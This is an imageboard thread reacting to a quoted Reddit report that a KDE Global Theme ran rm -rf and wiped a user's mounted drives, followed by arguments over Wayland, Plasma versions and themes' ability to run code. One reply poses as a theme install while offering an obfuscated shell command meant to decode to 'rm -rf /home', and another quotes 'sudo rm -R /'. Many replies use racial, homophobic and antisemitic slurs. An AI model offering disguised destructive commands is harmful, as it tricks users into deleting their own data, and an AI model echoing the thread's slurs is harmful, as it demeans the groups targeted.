>Do NOT install Global Themes - Some wipe out ALL YOUR DATA General Bug
>Dear Community and KDE,
>I just installed this Global Theme, innocently (Global Themes -> Add New...):
>It DELETES all your USER mounted drives data. It executes rm -rf on your behalf, deletes all personal data immediately. No questions asked.
>I'd appreciate it if anyone could escalate this, I find it totally mind blowing that installing skins allow script execution so easily. I cancelled this when it asked for my root password, but it was too late for my personal data. All drives mounted under my user were gone, down to 0 bytes, games, configurations, browser data, home folder, all gone.
>As per OpenSUSE Reddit users, they indicated that this plasmoid executes rm functions
>Please investigate and escalate 🙂 - I'll be busy reinstalling all my system from scratch, restoring data to go back to work.
>UPDATE: Really wanted to appreciate the community for the response and overall reactions of developers. Remember to backup important data, and keep in mind we are all part of making these systems better, as I felt well to be able to share this and be heard. In any OS us users authorize programs to execute things on our behalf, so remember always to run trusted software! I can't confirm whether this was malicious, to my understanding it was just a compatibility and programmers mistake gone south. Looking forward to what this brings in unmoderated community content management.
312
Do NOT install Computer Programs - Some wipe out ALL YOUR DATA
Sound advice
Return to monke
updooters gonna updoot. y'all get what you deserve.
It's not updooting if it was a new program/script
It's a Plasma 6 issue, is it not? In other words, an updooter issue.
How is it a Plasma 6 issue? I didn't see anything Plasma 6 specific in the issue myself, but maybe you've been more thorough.
Because it works as intended on Plasma 5.
Indeed it does lol. That's sorta the point. You don't have a clue what the issue is about do you lol
I was replying to
, moron. Obviously I know that it only affects updooters.
But that's the thing, it DOESN'T only affect updooters. It happens on Plasma 5 too because of course it does, if you had read what is going on you'd know it has nothing to do with Plasma versions. Lmao RTFT
>if you had read what is going on you'd know it has nothing to do with Plasma versions.
...anon says, while indicating that he didn't read what is going on.
>Heh, this plasmoid aczully runs on KDE5 but in KDE6 it just wipes your disk
>So technically KDE was not pozzed by virus, it was just a mere accident
>arguing with voices in your head
Here, (You) dropped these.
clown world if everything comes from plebbit, gets regurgitated by other shit and ends up here
B... but muh Wayland suppose to be secure! How could that happen?
Can you explain what Wayland has to do with KDE themes? As far as I am aware this issue isn't happening on Gnome (or any other Wayland compositor)
you are (probably) talking to a bot
>criticisms against wayland makes you a bot
Shills aren't even trying anymore
>t.bot
>KDE start to force gayland to everyone as default
>suddenly a bunch of security issues and bugs start appearing
>That's just a coincidence goy, wayland is secure an trustworthy, just like rust and vaccines. Stop asking questions.
No no, go ahead and explain how exactly Wayland has something to do with this. Or is it secret knowledge not to be shared? lmao
Probably just a moron
New protocol to implement themes means new bugs.
And you think this error is related to Wayland how? Because if you read what's the issue you'd realize how fricking stupid you're being. Nothing to do with Wayland
NTA but if KDE is full of Waylandgays who are known to have low IQ then yes i can see it can be related.
>man I ran this script that had the line sudo rm -R / and lost all my shit
>frick wayland
not even using wayland, but it's clear the user is an idiot
You can't have "push to talk" because of "muh security" but GUI theme can wipe your drives clean. LOL. LMAO.
Silence, goy
>reddit thread
based
/thread
This is the same guy that will complain about Gnome not having global themes that can run arbitrary code
What does Wayland have to do with this..? I feel like you might not understand what Wayland is lol
install my theme
echo "`$'x72x6d' $'55x72x66' $'57x68x6fx6dx65'`" | aplay --src=stdin
>install
>aplay
my bad i put in the wrong command
try this
echo "`$'x72x6d' $'55x72x66' $'57x68x6fx6dx65'`" | kdethemeinstall
fricking staled memes
bash: kdethemeinstall: command not found
it doesn't work, anon... ... ...
Neat, it plays Zelda music!
>Be loonix user
>Install themes
>Data gets wiped
Sasuga power of free as in freedom of software
>tried to be a linux user
>tried installing a fricking theme
>shit crashes and i have to force a shutdown
>linuxBlack folk tell me to git gud and that its "distro problem" and to "get this distro instead"
it's not over for linuxgays because it never even began.
tell me to git gud and that its "distro problem" and to "get this distro instead"
Every single time I've complained about a deal-breaking issue. Then I install the distro, and I get different deal-breaking issues.
Just saw this thread. Pretty bad, but I wonder how this would be fixed.
yeah kde global themes actually use JS to rearrange desktop and other things. veirfy the js files on git repository before installing a theme.
baka my head. entirety of loonix desktop user space is a steaming pile of shit. i have had more problems while using a """"just werks"""" distro with a 1000 layers of abstraction for utilities than anything else.
>entirety of loonix desktop user space is a steaming pile of shit. i have had more problems while using a """"just werks"""" distro with a 1000 layers of abstraction for utilities than anything else.
autistic tiling wms win again
lmfao, still better than footgays themes
ill stick to the Black person hating hyprland
should have listened to ebussy and don't theme your app.
The Prophet
> PlasmaCore.DataSource "executable" engine arbitrary code execution via any QML file in backdoored wallpaper plugins, themes, etc. distributed via store.kde.org
> Reported: 2024-01-20
> Status: CLOSED INTENTIONAL
> store.kde.org/u/satorugojo
> Joined Feb 25 2024
Brand new account dumps code that blows up your computer.
>All drives mounted under my user were gone
I still can't believe Unix machines do shit like this. Drives should be in a magic volumes section controlled only by the OS.
Waylandbros, I thought the switch to Wayland would increase security?
Gnomechads. Were winning!
linux needs optional scoped storage like android.
Would that be possible, if Wayland introduced theme protocol?
>KDE actively warns you global themes can frick you over
>KDE actively warns you shouldn't trust and you must check what you're installing
>require permission escalation to fully install
>Some ricer just did next > next > root pass > ok
>It's kover
morons gonna moron
It's a terrible look for KDE regardless.
>bug
>user-made unofficial content
Not my problem.
>a terrible look
Go back to plebbit, homosexual.
>KDE believer gets mad at KDE critics in the face of a KDE catastrophe
Many such cases.
Must. Protect. KDE. Belief. System.
Sure anon, I'll hold your hand next time you're gonna cross the road too
Ummm, freetarudo-sistahs... I thought Wayland is a blessing that will secure my heckin desktop?
ricing is childish
breezechads stay winning
We Gnomechads don't have this issue.
Because you don't have features in the first place.
>Our bugs are actually features goys!!!1!1!11111
>Why yes, I don't have a fully functioning filepicker, how could you tell?
Is this a gnome meme? cause kde has had a filepicker since forever.
It is. GTK issue to be precise
KDE Black folk
>loonix can't even be trusted to safely install themes
>y-yeah windows and macos does provide a familiar, stable desktop b-but at least loonix is customizable
>*wipes your drives
lmaoooo
Can't wait for gnome 46 so I can stop using this trash.
There should be a separation between a theme that changes some cosmetics and a desktop overhaul. Using the same functionality for both means people will get complacent and ignore the warnings because 99% are safe and 1% contain buggy or outright malicious code.
MacOSX doesn't support themes so people made their own. But installing it meant fricking with system libraries so it was damned obvious it was dangerous and stupid.
It's not enough to say "warning, don't install themes you don't trust" because "trust" in this instance means "audited the github" which very few people are capable of. Much better to support the 99% cases of people just wanting some window dressing and leave the 1% to figure out how to trust 3rd party bullshit through a special interface that says "WARNING: you don't want to frick with this. Type 'I am an idiot' to continue."
is this the power of le most secure operating system?
Linix community is so stupid they thought running arbitary JavaScript on desktop would be safe
This is why gnome is the default. Waiting for gnome 46. Gnomechads win again.
xfce is what sane people use
All those gays with corporate support are unable to make DE that works well
no one actually uses xfeces
Shut up, perpetual beta tester gay
>You will install the newest neonpurple highcontrast theme with windows 98 user login made by Sanjaay Dhamar that has 4 stars out of 5 by default but 0 reviews